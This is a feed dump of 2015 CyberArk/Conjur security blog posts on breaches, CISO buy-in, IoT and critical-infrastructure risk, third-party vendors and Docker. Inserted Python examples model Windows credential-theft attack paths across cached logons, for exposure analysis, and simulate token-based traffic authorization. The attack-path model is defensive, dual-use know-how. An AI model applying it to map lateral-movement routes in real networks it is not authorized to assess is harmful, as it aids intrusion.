With this business environment and rapid change, companies also have to proactively protect IP, brand and other assets. Among increasingly numerous strategic priorities, C-level leaders also have to plan for cyber threats that will affect business. Heightened media coverage of data breaches – many involving compromised privileged credentials – has increased the C-Suite’s interest in cyber security programs. Industry statistics show that 80 percent of board members say that cyber security is discussed at most or all board meetings, while 87 percent of CEOs are concerned about cyber threats, and half are ‘extremely concerned.’ The interest is there, but now there has to be sustained focus and attention to effectively roll out enterprise-wide security programs. To get C-level buy-in, CISOs must not only share the right amount of information, but also the level of detail that will resonate the most.

Gartner’s Paul Proctor provided an example of this. For an automobile CEO, he noted, it’s best to translate security problems into a language s/he understands – car production in this case. Executives know that one new automobile rolls off the assembly line every 90 seconds. That means an hour of IT downtime results in 40 fewer cars being assembled. Effective communications would focus on this type of cause/effect. Ideally, the security managers “report less cars in inventory to their executives, not IT downtime. Their executives don’t care about IT downtime; they care about cars.”

As their roles continue to evolve, CISOs recognize the value of effective communication skills in gaining executive cooperation and building lasting support for enterprise-wide change.

Azeem Bashir, former CISO at Fujitsu, echoed this advice in a recent CSO piece, stating, “Communication is essential. If the board is not listening to you, then rolling out your strategy or transformation program is just a tick-in-the-box. You need buy in at the top. Depending on the issue, communicating properly to a level they can understand is essential. They are fed up with scare stories.” He also advises CISOs to get advice from peers, to be less driven by tick-box compliance and to be more focused on agile leadership and TQM (top quality management) in order to address business risk.

On that note, CyberArk is championing an industry initiative called the CISO View to ensure CISOs can learn best practices from their peers. It’s no surprise that communication was among the key topics the 12 CISOs from Global 1000 companies explored in the inaugural CISO View report, The Balancing Act: The CISO View on Improving Privileged Access Controls.

The CISOs interviewed offer practical recommendations for communicating more effectively, building a powerful case, and ultimately, getting buy-in from the executive team to bolster an organization’s privileged account security program. The report includes recommendations based upon their experience rolling out enterprise wide privileged account security programs.

In the report, Gary Harbison, Chief Information Security Officer for Monsanto Company says, “Make it real. Show the executives how business data can be accessed through privileged accounts. It’s the quickest way for an attacker to go after data and one of their main tools to drive a data breach.”

Within the report, some of the data the CISOs recommend for building and presenting a case for the C-suite includes:

  • Analysis of high profile breaches as they relate to your company
  • Penetration testing results
  • Benchmarking
  • Compliance requirements
  • Proof-of-concept results

You’ll also find detailed information on the key metrics that these experienced CISOs have used to help the C-Suite understand the value of a privileged access management program and how to best track the progress.

Ready for more actionable advice? Download the report.

Another Day, Another Hotel Breach https://www.cyberark.com/blog/another-day-another-hotel-breach/ Mon, 30 Nov 2015 14:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/another-day-another-hotel-breach/  

Looks like another popular hotel chain has been hacked. Starwood Hotels has reported that payment systems at 54 of its locations were targeted by a malware attack. Credit card information such as first and last names, card numbers, expiration dates, and security codes was taken; however, personal information such as billing addresses was unaffected.

As we’ve previously discussed, it is crucial for enterprises to make sure that third party providers are adequately securing data. The Starwood breach is an example of this, as the payment systems that were hacked were third party POS machines located in gift shops, restaurants, and coffee shops.


Here’s what you need to know:

Starwood maintains that the guest reservation system was not compromised in the hacks, so if you didn’t dine at the hotel or make any purchases outside of the room, you’re safe. For some of the affected hotels, card data was exposed for months, with the breach going undetected the entire time.

This is a comprehensive list of all of the breached hotels. In addition to hotel names, it also provides the dates during which credit cards could have been compromised.

If you’re currently staying at a Starwood hotel, or are planning on relaxing there during the upcoming holidays, not to worry, the situation has been handled, the malware is no longer a threat, and all credit card information is now secured.

This piece from eWeek mentions that it took almost 5 months for the breaches to be reported. This doesn’t seem to be much of a coincidence, as Starwood was very recently acquired by Marriott International. It would make sense that Starwood wouldn’t publicize the breach until after the deal was done.

If these POS devices had better security and audit capabilities in place, perhaps the breaches wouldn’t have gone undetected for as long as they did. Thankfully, with each new breach new pressure is put on enterprises to have better security in place to protect consumer data. Hopefully, the new year will mean a new commitment toward secrets management and infrastructure security. 

If you and your organization are just getting started with your 2016 security planning, or are in the process of moving to a hybrid cloud strategy, it is vital that you do your research before getting started. We’ve created a free, dynamic security glossary that has all the information you need to get you up to speed in no time. 

5 Things We’re Thankful For This Thanksgiving https://www.cyberark.com/blog/5-things-were-thankful-for-this-thanksgiving/ Wed, 25 Nov 2015 16:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-things-were-thankful-for-this-thanksgiving/  

It’s the time of year when we gather together with friends and family and actively appreciate all of the wonderful things we have in our life. We’d like to call some attention to the vital people within the Conjur family that have been instrumental in making 2015 our most successful year ever.


1) Our Team

Although everyone in this post is important, this one is the most dear to us. Everyday we are surrounded by talented and intelligent individuals who are inspired to work as a team and deliver outstanding results. They are committed to our mission and we are truly grateful for their dedication. Not only are they exceptional people, but they’re pretty fun too, playing Smash Brothers together, participating in a 100 Push Up Challenge ( yup, you read that right, 100), Escaping the Room in Boston, and having a company hack-a-thon! 

2) Our Investors

We’re lucky to have an impressive team of investors who truly believe in our mission and are totally committed to our success. Many thanks to Amplify Partners, Avalon Ventures, and Andy Palmer

3) Our Customers

Our customers are some of the best in the business and we applaud their thought leadership and vision. These are the companies who are ahead-of-the-curve when it comes to security. We are so thankful that they put faith in our product to help them secure their infrastructure; we take our duty very seriously and we are thrilled to work with them.

4) Our Hometown and Partnerships

It has been a fantastic couple of years as part of the blossoming tech community in Boston. We are proud to be involved with MassTLC and are happy local partners with HubSpot, InsightSquared, and YesWare (all Boston-based companies, and all awesome!). Also, a special thanks to Drizly, for helping us keep our office fully stocked on Friday afternoons!

5) Our Team Mascot, Furnando

Furnando is our favorite furry friend. Yes, he keeps us on our toes but he always manages to brighten up our week… look at that little face, how could you not love him?!


Wishing you and yours a very happy and restful Thanksgiving,

The Conjur Team 

Security and the Internet of Things https://www.cyberark.com/blog/security-and-the-internet-of-things/ Tue, 24 Nov 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-and-the-internet-of-things/  

Today, it seems everything is automated. I can set my coffee pot to begin brewing at 6:30AM sharp, turn my lights off with a remote control, and start my car from bed on a cold winter morning, all with the push of a button. 

The Downfall of Going Digital

Once you start going digital it’s hard to stop; you want to automate every single part of your life. I can travel to any destination, regardless of whether I actually know how to get there, trusting my car’s navigation system to lead the way. Heck, some people can even turn on their home alarm system or adjust heat settings all from their smartphone. By 2020 the amount of Internet-connected things will reach 50 billion. These numbers are exciting, as they mean that we will become more efficient and technologically advanced. Although the Internet of Things (IoT) is making our lives so much simpler, it can also pose security concerns. As automation increases it is important that more security measures are also taken so we can safely reap all the benefits the IoT has to offer. We cannot forget that without proper security, we are putting ourselves at risk.

What seems to be less talked about are the potentially negative effects of the IoT. We heard about the Jeep wifi hack a few months ago. Although that scenario was planned, the fact still remains that it was possible. In the next five years, approximately 90% of cars will be connected to the internet. A study from consulting firm McKinsey & Co found that 90% of accidents will be eliminated thanks to self-driving cars, as cars will be able to effectively communicate with one another, avoiding collisions and making the road a safer place to be. However, if people can hack into our car systems and run them off the road, does this statistic make much of a difference?

As drivers, we can practice safer driving while behind the wheel but we can’t protect ourselves from being hacked. If all of the car wifi systems were breached it would pose devastating effects for drivers and manufacturers alike. One of the newest technologies is automated weapons, helping soldiers deliver more precise shots. This seems like a fantastic development to avoid bystander casualties, and it is, until the opposition is able to hack into those weapons and change the intended target.

Healthcare is one of the newest industries the IoT is predicted to improve. With pill bottles that remember when they were last opened, wireless devices to monitor heart rate and body fat percentages, and digital glucose testers, it is much easier for patients to practice at-home care. Doctors are able to track all of these statistics to make sure their patients are well, avoiding unnecessary trips to the office. These devices also let doctors take care of more people throughout the day. But as our data is being sent back and forth to different devices, and stored in multiple data centers, it is at risk of being compromised, especially if the third-party vendors don’t take proper security precautions.

With an increase in devices that connect to the internet there is a natural increase in points of entry for hackers to access our data. As more industries automate, more sensitive information will become vulnerable. Our medical records, social security numbers, passwords, and alarm codes are just some of the data that is at risk. There have already been extensive breaches involving nothing more than credit cards and digital medical files. If our stance on security remains the same, imagine how much worse it will get when everything is digital. You might not think someone hacking into your wearable device is a problem, but if hackers install malware that uncovers all of your passwords and is able to access your smartphone, all of your personal information and accounts could be compromised.

IoT takes human interaction out of the equation; instead we have machines making decisions for us. It might seem more precise to have computers zeroing in on our target or deciding when it is safe to change lanes; however, these methods are a lot more volatile than those of human operators if not properly secured.

In order to reap all the benefits the IoT has to offer, we need to make sure that security is a chief factor going forward, specifically as it relates to Identity.  The enterprises developing these exciting technologies need to be able to place an identity on all of their devices, users, and machines that contribute to the development, testing, and production of IoT. With these newly-created identities, enterprises can then manage the authorization and authentication of their environment for maximum control and compliance.  Without this important data, organizations will be flying blind with no insight into who has access to what, when.

At Conjur we help companies solve this very problem.  To learn more schedule a demo here.


]]>
Global 1000 CISOs Share Experience with Improving Privileged Access Controls https://www.cyberark.com/blog/global-1000-cisos-share-experience-with-improving-privileged-access-controls/ Thu, 19 Nov 2015 13:37:52 +0000 https://www.cyberark.com/blog//

Data breaches have become a fixture in today’s headlines. Time and time again, security researchers pinpoint a common denominator in the attack chain: the exploitation of privileged accounts. There is a growing realization that preventing the theft of highly privileged credentials could short-circuit the majority of today’s sophisticated cyber attacks. This has prompted many organizations to rethink existing privileged access controls and prioritize the implementation of comprehensive privileged account security programs.

Protecting privileged credentials is one of the most pressing challenges CISOs face today. Consider this perspective: “If you don’t have good practices in privileged account management, you’re making it very easy for adversaries to traverse your whole network. If they get a hold of an over-privileged account, they’ll run through the environment like a brushfire,” says Jim Connelly, Vice President & Chief Information Security Officer, Lockheed Martin.

To help organizations accelerate their strategies to improve privileged access controls, CyberArk sponsored the CISO View Industry initiative. As part of this initiative, industry analyst firm Robinson Insight conducted research via in-depth interviews with some of the world’s leading security executives at Global 1000 organizations across major industries. The CISO panel included representation from: ING Bank, CIBC, Lockheed Martin, Starbucks, ANZ, CSX Corporation, Monsanto Company, Manulife, Rockwell Automation, News UK, Carlson Wagonlit Travel and McKesson.

Available today, the report, entitled The Balancing Act: The CISO View on Improving Privileged Access Controls, explores considerations for successfully implementing enterprise-wide privileged account security programs. The panelists’ first-hand perspectives provide valuable insights and sage advice based upon a wide range of experience implementing critical, widespread changes.

The recommendations consider the right balance between enabling and restricting high-levels of access to information assets. Whether planning or implementing a program, there is useful guidance available for security leaders and practitioners.

For example, key considerations early in the planning process include, “What should you do, and when?” The first chapter offers peer-to-peer guidance from the expert panel on making these core decisions, and the panelists offer perspective on the best approach for identifying and prioritizing accounts. As Dave Estlick, Information Security Chief at Starbucks, explains, “You need to figure out, ‘Where’s the area that I’m going to be able to demonstrate business value?’ not just the uplift in security but operational efficiencies.”

Sharing information on good security practices is more important than ever as organizations face increasingly sophisticated cyber threats. At CyberArk, we believe if security teams are armed with the leading wisdom of the CISO community, it will help strengthen security strategies and lead to better-protected organizations. As a provider of privileged account security solutions, we recognize that protecting privileged access is more than a security challenge – it also spans people, process and technology. It requires engagement and ongoing collaboration with the CISO community to solve.

We’ll continue to highlight and explore some of the issues addressed by the CISO panel in future blog posts; in the meantime, you can download and read the full report now: https://www.cyberark.com/cisoview/.

]]>
We’re At DevOpsDays Ohio https://www.cyberark.com/blog/were-at-devopsdays-ohio/ Wed, 18 Nov 2015 21:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/were-at-devopsdays-ohio/  

Our Developer Advocate, Dustin Collins, is attending DevOps Days Ohio today and tomorrow. He will be speaking tomorrow morning (11/19) at 9:55 AM on Human Error and Secure Systems.

Dustin will cover the traditional view of human error and discuss how this idea hinders our ability to create and maintain secure systems.

By understanding human error in a new way, we can minimize risk and maximize the learning opportunity in software development and operations. Not sure if these new ideas will fly in your organization? Dustin will cover the right way to “sell” these concepts.

Want to connect with Dustin in Ohio? He’d love to chat with you! Drop us a line and we can schedule some time for you both to meet.


]]>
2015 Data Breach Forecast, A Year in Review https://www.cyberark.com/blog/2015-data-breach-forecast-a-year-in-review/ Wed, 18 Nov 2015 17:39:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-data-breach-forecast-a-year-in-review/  

Not all publicity is good publicity, that’s no secret. As more and more data breaches make headlines, consumers and executives are hopefully starting to get the message that security needs to become a priority or there will be costly repercussions.

Early in 2015 Experian published its second annual data breach industry forecast. It predicted that executives would start to take cybersecurity more seriously and take more steps to make sure proper solutions were in place to mitigate or eliminate risk. As we head toward the holidays and begin thinking about 2016, it is helpful to look back and learn from the mistakes and mishaps that occurred.  Since 2015 was the year of breaches such as Ashley Madison, Hilton Hotels, and OPM there are plenty of examples to study.  

Experian explains that it is difficult to prevent breaches as hackers are ahead of the curve in terms of new technologies; they are already planning on hacking systems most enterprises haven’t even adopted yet. The new chip technology for credit cards was announced early in 2015, with most companies adopting the chip cards in October. Since hackers have known department stores would make the switch, it is likely that over the past year they have been searching for, and finding, vulnerabilities in the new, seemingly more secure payment system.

As the holidays are fast approaching more people will be using credit cards. There is such a sense of security in these new cards that people might be less careful with their information and less likely to notice suspicious activity on their credit card statements. Although it is great that retailers and credit card companies are making the switch to chip enabled payment, they must take additional steps to secure consumers’ private information.

Experian also predicted that 2015 would see an increase in breaches related to the healthcare industry. As the healthcare industry moves toward electronic record keeping, and holds some of patients’ most sensitive data, it is easy to understand how it is one of the biggest targets. Experian’s prediction was correct: the healthcare industry had the most data breaches in 2015, and these incidents also exposed the most records. The Anthem breach, in which 78.8 million records were leaked, was one of the biggest healthcare breaches of 2015.

In its research Experian found that in 2014, 73% of companies worked to create a data breach response plan. This confirms that businesses believe their IT environments have weaknesses that can be breached. Although creating a response plan is a step in the right direction, it really shouldn’t be the first, or only, step toward better security.

We should be focused on systems and applications that prevent data breaches before they happen. We need ahead of the curve technologies that will allow us to keep up with cyber criminals instead of remaining a step or two behind them. Experian published this study publicly; if companies had read it and taken the warnings and predictions seriously many of these breaches could have been prevented, or at least detected sooner.

Although it is helpful to find out that our information has been compromised as soon as possible, what steps can we really take if things like social security numbers have been exposed? As it is typical for breaches to be discovered years after the fact, we, as consumers, are left with even fewer options. Although it is great that businesses are working to create appropriate response plans to these types of hacks, this can’t be their only step toward pushing for better security; this cannot be the final solution.

With our current focus on increased automation, the Internet of Things has made us more prone to attacks in 2015 and will continue to do so in 2016 if certain preventative measures aren’t in place. For more information on securing your infrastructure check out this case study in which we outline how to manage, secure, and audit permissions across an entire cloud infrastructure.  


]]>
Reducing the Cyber Attack Surface for Critical Infrastructure https://www.cyberark.com/blog/reducing-the-cyber-attack-surface-for-critical-infrastructure/ Tue, 17 Nov 2015 20:46:11 +0000 https://www.cyberark.com/blog//

Our CEO Udi Mokady was on Mad Money last week talking with Host Jim Cramer about the cyber security market and the proactive measures companies take to secure the inside of their networks. Our products are sold globally and across many industries. Noting our growing and diverse customer base, Jim asked, “What is manufacturing worried about?” Udi explained that they want to protect intellectual property and personally identifiable information about employees, customers and suppliers.

It’s a good reminder that people traditionally associate cyber security and breaches with financial services companies, but cyber security threats are now horizontal for a variety of reasons.

Not only do companies have to rethink what hackers view as valuable – money is not the only motivation – they also need to understand there are many threat actors including nation states, non-nation states, hacktivists, malicious insiders, vendor/supply chain access and terrorists. There are hackers for hire, and there is a market for them.

While the most intrusive breaches primarily target the IT/Corporate environment, serious actors increasingly target industrial control systems. They are stealthily surveying systems and building the capabilities to execute attacks in the long term. (Keep in mind, attackers often have more than 200 days on a network before being discovered.)

Risks associated with our critical infrastructure continue to increase as companies adopt new technologies. According to a Chatham House Report issued in September 2015, “there is a rise in factors that make nuclear facilities more vulnerable to cyber attack, with facilities increasingly adopting digital systems, making use of commercial off-the-shelf software, and connecting to the internet. All of these offer considerable cost savings but are easier to hack.”

New realities and use of technology require rethinking processes, security measures and interactions. For example, there has to be better coordination and communications between IT security and OT. As pointed out in a recent article by the InfoSec Institute, “OT engineers have to report any activity that has been conducted at the equipment and any suspicious activity they have noticed. Every modification to one of the components in the nuclear facility could potentially open the doors to cyber threats, so the IT engineers have to monitor carefully the “evolution” of the plant. Face-to-face contact between IT engineers and IT personnel is a key factor to sustain mutual understanding between the two cultures so close, but so different.”

November is Critical Infrastructure Security and Resilience month, so it’s a good time to highlight related security threats, trends and mitigation best practices. I recently shared 5 IT Best Practices that also Mitigate Cyber Security Vulnerabilities in OT.

I would also like to share a few of the trends in OT security that were highlighted at NERC’s annual Grid Security Conference (GridSecCon):

  • Security is strategically significant in the C-suite. Awareness of the impact of a cyber attack on operations has put security on the C-Suite radar. Companies recognize the need to implement comprehensive risk management programs, rather than simply meet minimal regulatory compliance. This is encouraging news.

IT and OT security experts agree that companies can mitigate a significant amount of risk by proactively implementing best practices and security programs that reduce the attack surface. Some things to keep in mind:

  • Phishing and other social engineering techniques are still a prevalent entry point into the organization. Continue to foster a culture of security through social engineering awareness and training.
  • Operate as if you’ve been compromised. Perimeter security often cannot stop Advanced Persistent Threats (APTs). A determined attacker will get in, and that’s why security inside the network is crucial, especially as it relates to privileged users (including vendors).
  • Lock down credentials and implement a credential-management program.
  • Monitor vendor access. Ensure that vendors only access the systems they’re authorized to access, for a limited amount of time (i.e., no more sessions left idle for 2 weeks).

Speaking of monitoring vendor access, you might be interested in watching one of our webinars, “Securing Remote Vendor Access with Privileged Account Security.”

]]>
3 Key Reasons You Should Know Your Service Provider https://www.cyberark.com/blog/3-key-reasons-you-should-know-your-service-provider/ Mon, 16 Nov 2015 19:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-key-reasons-you-should-know-your-service-provider/  

Increasingly, regulators are coming to recognize the relative importance of third party firms to the financial services industry broadly, and to the DevOps Community specifically. For the past few years, a pattern has emerged in which regulators are placing an increased emphasis on how financial institutions work with, rely upon, and share sensitive data with third party firms.

With no end in sight to how prevalent third party firms are to the financial infrastructure, it makes sense to look at a few highlights as they relate to their role:

  1. For years, the FFIEC has argued that regulated financial institutions must review the way in which outsourced firms, which service the smaller segment of the US banking market, access and store their data. The scope of these rules has extended from availability to controls, audit readiness, attestations (e.g. SOC I, SOC II, etc.), and standards such as those described by ISACA, NIST, the Shared Assessments Program, and others. How those regulatory rules, controls frameworks, and standards systems expand and morph in the coming years as a result of a continually expanding and elaborate threat environment remains to be seen. One thing’s for sure: the status quo is certainly not a given.
  2. Recent large-scale data breaches have resulted from vulnerabilities within third party firms. In the U.S., there are many examples of this. Just look at how an HVAC firm was implicated in the massive Target data breach or how the marathon charity-race organizers were identified by investigators as the main culprit in the large JPMC data breach. It is important to keep in mind that outside the public limelight there are even more scenarios that undoubtedly occur. In short, third party service providers of seemingly little relevance to the main organization they are servicing oftentimes serve as the soft underbelly of these financial services firms.
  3. Recently, the SEC and FTC – neither of which has historically come out with specific rules and requirements having to do with cybersecurity – are pushing into this realm and the third party handling of data. This focus, which stems from the point I made above, will continue to grow if the past 12-18 months are any indication. To make matters worse, the hurry to issue regulations as a result of recent cybersecurity incidents makes it difficult for examinees and the other regulated entities to truly be prepared within the prescribed time-frame.

So, what does this all mean?

  • Well, firstly, how well you know the data practices of your downstream 3rd party firms is very critical. Even if this is not something that regulators are asking you about, it is only a matter of time until they do.
  • Secondly, it is key that you can demonstrate to your shareholders and internal stakeholders (e.g. internal audit, infosec, etc.) that you can prove how your 3rd party service providers are protecting your data. Again, if they’re not yet asking you for this sort of information, make no mistake – they will shortly.
  • And finally, if those 3rd party service providers know you are watching them and are able to audit them remotely, etc., then this is likely to enforce a strong culture of data integrity, data protection, and general best practice when it comes to access, authorization, and authentication. Research shows that changing cultural perceptions is critical as a first step in such situations.


]]>
What percentage of your Windows network is exposed to credential theft attacks? https://www.cyberark.com/blog/what-percentage-of-your-windows-network-is-exposed-to-credential-theft-attacks/ Thu, 12 Nov 2015 15:41:02 +0000 https://www.cyberark.com/blog//

Andrey Dulkin is the director of cyber innovation at CyberArk Labs. He leads a team of cyber security experts who conduct research focused on targeted attacks against organizational networks – the methods, tools and techniques employed by targeted attackers, as well as methods and techniques to detect and mitigate such attacks.

In a CyberArk Labs research report now available, “Analyzing Real-World Exposure to Windows Credential Theft Attacks,” the team reviewed data from more than 50 networks to identify the prevalence and risk of what are referred to as “highly threatening machines.”

According to Dulkin, “In a given network, there are typically a number of highly threatening machines that can give an attacker the credentials needed to completely compromise the majority of Windows hosts on the network. We’ve seen similar credential theft methods as the basis for major attacks across a number of organizations. Identifying these machines and securing the associated privileged credentials against theft and exploitation is a critical step in securing against advanced cyber attacks.”

Focused on measuring network exposure, the research aims to determine how much of a Windows network is typically exposed through the compromise of a single privileged account on a single Windows host.

His team found that, on average, 40 percent of the Windows hosts on a given network, if compromised, would provide an attacker credentials that would facilitate complete compromise of the vast majority of the other Windows hosts on that network – whether directly or through a series of compromises.

The research also examines several mitigation techniques to effectively reduce the threat level in the network. Download the report for full details here: https://www.cyberark.com/resource/analyzing-real-world-exposure-to-windows-credential-theft-attacks/
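To make the “series of compromises” idea concrete, here is an added example (not the CyberArk Labs data, tooling or DNA): a small model in which hosts cache the credentials of accounts that logged on to them and accounts hold local admin rights on hosts, so compromising one host transitively yields others. The host and account names, the cached-credential map and the 80% threshold for “highly threatening” are constructed assumptions; the last function shows how removing one cached account from the model changes the result.

```python
"""Model of Windows credential-theft exposure (added example, not the
CyberArk Labs data or tooling). Hosts cache credentials of accounts that
logged on to them; accounts hold local admin rights on hosts. Compromising
a host yields its cached accounts, each of which yields admin on more
hosts, and so on. A host is "highly threatening" when that chain reaches
most of the network. All names below are constructed sample data.
"""
from collections import deque

WORKSTATIONS = [f"WKS-{i:02d}" for i in range(1, 8)]
SERVERS = ["SRV-FILE", "SRV-SQL", "DC-01"]
ALL_HOSTS = set(WORKSTATIONS) | set(SERVERS)

# host -> accounts whose credentials are cached there (constructed)
CREDS_ON_HOST = {ws: {f"user{ws[-2:]}"} for ws in WORKSTATIONS}
CREDS_ON_HOST["WKS-02"].add("helpdesk-svc")  # helpdesk account logged on here
CREDS_ON_HOST.update({
    "SRV-FILE": {"helpdesk-svc", "backup-svc"},
    "SRV-SQL": {"backup-svc"},
    "DC-01": {"domain-admin"},
})

# account -> hosts where it holds local admin rights (constructed)
ADMIN_ON = {f"user{ws[-2:]}": {ws} for ws in WORKSTATIONS}
ADMIN_ON.update({
    "helpdesk-svc": set(WORKSTATIONS) | {"SRV-FILE"},
    "backup-svc": {"SRV-FILE", "SRV-SQL", "DC-01"},
    "domain-admin": set(ALL_HOSTS),
})


def reachable_hosts(start, creds_on_host, admin_on):
    """Hosts controlled after compromising `start`, following
    cached-credential -> admin-rights edges transitively (BFS)."""
    compromised = {start}
    queue = deque([start])
    while queue:
        host = queue.popleft()
        for account in creds_on_host.get(host, ()):
            for target in admin_on.get(account, ()):
                if target not in compromised:
                    compromised.add(target)
                    queue.append(target)
    return compromised


def all_hosts(creds_on_host, admin_on):
    hosts = set(creds_on_host)
    for targets in admin_on.values():
        hosts |= set(targets)
    return hosts


def exposure_by_host(creds_on_host, admin_on):
    """Fraction of the *other* hosts that fall if this host is compromised."""
    hosts = all_hosts(creds_on_host, admin_on)
    others = max(len(hosts) - 1, 1)
    return {h: (len(reachable_hosts(h, creds_on_host, admin_on)) - 1) / others
            for h in hosts}


def highly_threatening(creds_on_host, admin_on, threshold=0.8):
    """Hosts whose compromise reaches at least `threshold` of the network."""
    return {h for h, frac in exposure_by_host(creds_on_host, admin_on).items()
            if frac >= threshold}


def network_exposure(creds_on_host, admin_on, threshold=0.8):
    """Share of all hosts that are highly threatening (the report's metric)."""
    hosts = all_hosts(creds_on_host, admin_on)
    return len(highly_threatening(creds_on_host, admin_on, threshold)) / len(hosts)


def without_cached_account(creds_on_host, account):
    """Mitigation scenario: the account's credentials are no longer cached
    anywhere (e.g. its logon is restricted or it is vaulted and rotated)."""
    return {h: accts - {account} for h, accts in creds_on_host.items()}


if __name__ == "__main__":
    for host, frac in sorted(exposure_by_host(CREDS_ON_HOST, ADMIN_ON).items()):
        print(f"{host:9s} exposes {frac:.0%} of the other hosts")
    print("highly threatening:", sorted(highly_threatening(CREDS_ON_HOST, ADMIN_ON)))
    print(f"network exposure: {network_exposure(CREDS_ON_HOST, ADMIN_ON):.0%}")
    fixed = without_cached_account(CREDS_ON_HOST, "helpdesk-svc")
    print(f"after removing helpdesk-svc caching: {network_exposure(fixed, ADMIN_ON):.0%}")
```

In the constructed network, one workstation with a cached helpdesk credential is as dangerous as the domain controller; stopping that account from being cached on workstations removes it from the threatening set.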

If you need a tool to identify the privileged accounts on your networks, you can use CyberArk Discovery & Audit (DNA). It’s free. For more information on CyberArk DNA and to sign up for a trial evaluation, visit https://www.cyberark.com/discovery-audit-cyberark-dna/.

]]>
5 Traffic Authorization Best Practices For IT Security https://www.cyberark.com/blog/5-traffic-authorization-best-practices-for-it-security/ Thu, 12 Nov 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-traffic-authorization-best-practices-for-it-security/  

In any service-oriented architecture, securely governing the allowable communication between applications and services is key. It is equally as important to yield a secure way for developers and operations to directly communicate with applications and services.

Not sure how to do this? Traffic Authorization is the process of assigning everything in your infrastructure a unique identity with specific access control rules.  You need the ability to filter inbound and outbound traffic in an auditable fashion in order to achieve your compliance goals.

Traffic Authorization Tips

Here are our 5 Traffic Authorization Best Practices:

1) Don’t use passwords to grant access.

Instead, have a traffic authorization gatekeeper. A gatekeeper is a reverse proxy that sits in front of the server, intercepting all inbound requests and verifying the token authenticity and authorization privileges of the client, using the Token Broker. A gatekeeper also allows you to separate roles.

2) Use a Forwarder

A forwarder is a reverse proxy that runs on your local machine. It intercepts each connection to your server and places an authorization token on it. The authorization token is given to the forwarder by the Token Broker.

3) Set a Policy and Create Identities 

Always have a well-defined security policy. The gatekeeper needs this policy, as this is what it enforces. Don’t forget to assign client identities. Clients have to present an auth token to the gatekeeper.

4) Use Containers

Make deploying the application easier by using a Docker container so both the client and server can be launched and managed using the same tool: docker.

5) Make it easy on yourself… Avoid Software Defined Networking

Avoid using software defined networking to monitor and manage authorized inbound and outbound traffic. Not only is this method difficult to manage, but it also provides the risk that security will be loosened when people or code relax the traffic rules for their own purposes. Additionally, it is difficult to interact with these systems from outside of the cloud environment and thus all of your security is tied to the cloud vendor.
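The broker, forwarder and gatekeeper flow from tips 1 to 3, as an added example that is not Conjur’s own code: a stdlib-only Python simulation with short-lived HMAC-SHA256 tokens, a policy mapping client identities to the services they may reach, and an audit log of every decision. The token format, the signing key, the identities and the service names in `POLICY` are constructed assumptions.

```python
"""Traffic authorization with a token broker, forwarder and gatekeeper
(added example, not Conjur's code). Tokens are short-lived, HMAC-SHA256
signed; the policy maps client identities to allowed services; every
gatekeeper decision is appended to an audit log. Key, identities and
service names are constructed for the demo.
"""
import base64
import hashlib
import hmac
import json
import time


class TokenBroker:
    """Issues tokens to client identities and verifies them for gatekeepers."""

    def __init__(self, key, ttl=300):
        self._key = key  # constructed demo key; a real broker keeps this secret
        self.ttl = ttl

    def issue(self, client_id, now=None):
        now = int(time.time()) if now is None else now
        claims = {"sub": client_id, "iat": now, "exp": now + self.ttl}
        body = base64.urlsafe_b64encode(
            json.dumps(claims, sort_keys=True).encode()).decode()
        sig = hmac.new(self._key, body.encode(), hashlib.sha256).hexdigest()
        return f"{body}.{sig}"

    def verify(self, token, now=None):
        """Return the client identity, or None if malformed, forged or expired."""
        parts = token.split(".")
        if len(parts) != 2:
            return None
        body, sig = parts
        expected = hmac.new(self._key, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, sig):  # constant-time comparison
            return None
        try:
            claims = json.loads(base64.urlsafe_b64decode(body))
        except (ValueError, TypeError):  # bad base64 or bad JSON
            return None
        now = int(time.time()) if now is None else now
        if now >= claims.get("exp", 0):
            return None
        return claims.get("sub")


class Forwarder:
    """Local reverse proxy beside the client: attaches a broker-issued token
    so application code never handles a long-lived credential."""

    def __init__(self, client_id, broker):
        self.client_id = client_id
        self.broker = broker

    def send(self, request, now=None):
        req = dict(request)
        headers = dict(request.get("headers", {}))
        headers["Authorization"] = "Token " + self.broker.issue(self.client_id, now)
        req["headers"] = headers
        return req


class Gatekeeper:
    """Reverse proxy in front of a service: verifies the token through the
    broker, enforces policy, and records an audit entry for each decision."""

    def __init__(self, service, policy, broker):
        self.service = service
        self.policy = policy
        self.broker = broker
        self.audit_log = []

    def _decide(self, status, client, reason):
        self.audit_log.append({"service": self.service, "client": client,
                               "status": status, "reason": reason})
        return {"status": status, "client": client, "reason": reason}

    def handle(self, request, now=None):
        auth = request.get("headers", {}).get("Authorization", "")
        if not auth.startswith("Token "):
            return self._decide(401, None, "missing token")
        client = self.broker.verify(auth[len("Token "):], now)
        if client is None:
            return self._decide(401, None, "invalid or expired token")
        if self.service not in self.policy.get(client, set()):
            return self._decide(403, client, "not authorized for service")
        return self._decide(200, client, "allowed")


# Constructed policy: which client identities may reach which services.
POLICY = {
    "web-frontend": {"orders-api"},
    "batch-job": {"orders-api", "reports-api"},
}
```

A tampered or expired token is rejected before policy is consulted, and the policy rejects a valid identity that is not listed for the service, so the audit log distinguishes the two failure modes.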


]]>
Everyone’s Using Docker, Now It’s Time to Secure It https://www.cyberark.com/blog/everyones-using-docker-now-its-time-to-secure-it/ Wed, 11 Nov 2015 13:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/everyones-using-docker-now-its-time-to-secure-it/  

Docker seems to be gaining some much-deserved momentum lately. According to studies conducted by Datadog, Docker adoption is more common among large firms, despite the common assumption that large enterprises are typically the slowest to adopt new technologies.

It seems fitting, however, that bigger organizations are quickly adopting this technology as they move to hybrid cloud environments and continuous delivery workflows.

Adoption seems to be exploding, especially considering that until the last couple of years Docker had virtually no real position in the market. Of the 7,000 companies Datadog studied, 8.3% had adopted Docker, an almost 5x increase from the previous year’s 1.8%. Of the hosts monitored by Datadog, Docker runs on 6%. Companies clearly like this new wave of container technology, and these numbers will only increase in the coming months.

Docker seems to have customer delight down to a science. Most people who try Docker end up using it, becoming customers within 30-60 days of starting their trial. For these new customers, the number of containers they run triples between their first and sixth month of use.

